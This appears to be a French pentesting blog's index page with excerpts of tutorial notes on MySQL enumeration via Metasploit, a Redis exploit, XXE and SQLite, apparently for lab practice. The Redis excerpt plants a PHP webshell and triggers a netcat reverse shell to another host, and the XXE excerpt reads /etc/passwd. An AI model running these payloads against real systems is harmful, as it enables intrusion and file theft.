Énumération du service MySQL avec metasploit

On peut utiliser msfconsole pour exécuter des requêtes sur un serveur MYSQL use auxiliary/admin/mysql/mysql_sql set rhosts 10.9.0.15 set username root set password password run #la requête par défault est "select version()" set sql show databases run Énumération des tables use auxiliary/scanner/mysql/mysql_schemadump set rhosts 10.9.0.15 set username root set password password run Énumération des usagers et … Continuer la lecture

Exploit Redis

redis-cli -h 10.9.0.19 config set dir /var/www/html config set dbfilename shell.php set test "<?php system($_GET['cmd']);?> http://10.9.0.19/shell.php?cmd=nc 10.9.0.15 4444 -e /bin/sh S’il y a un exception, vous pouvez réessayer après avoir fait un backup et vidé la base de données. Ne pas oublier de restorer la bd Get Webshell ​ You must know the physical path … Continuer la lecture

Vulnérabilité XXE

Par exemple, un application envoie ses données sous forme XML <?xml version="1.0" encoding="UTF-8"?> <comment>   <name>Test</name>   <author>Germain</author>   <com>Une description ici.</com> </comment> Il pourrait être possible d’inclure un fichier <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE comment [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <comment>   <name>Test</name>   <author>Germain</author>   <com>Une description ici. &xxe;</com> </comment> Nous pourrions aussi avoir la possibilité d’exécuter do code … Continuer la lecture

SQLite 101

On rencontre souvent des bases de données dans des fichiers .db. La plupart du temps, elles sont au format sqlite Pour lire celle-ci, nous avons recours à l’utilitaire sqlite3 sqlite3 myfile.db Nous pouvons voir les tables dans la base de données .tables Ainsi que la structure de la table PRAGMA table_info(nom_de_la_table) Nous pouvons aussi retrouver … Continuer la lecture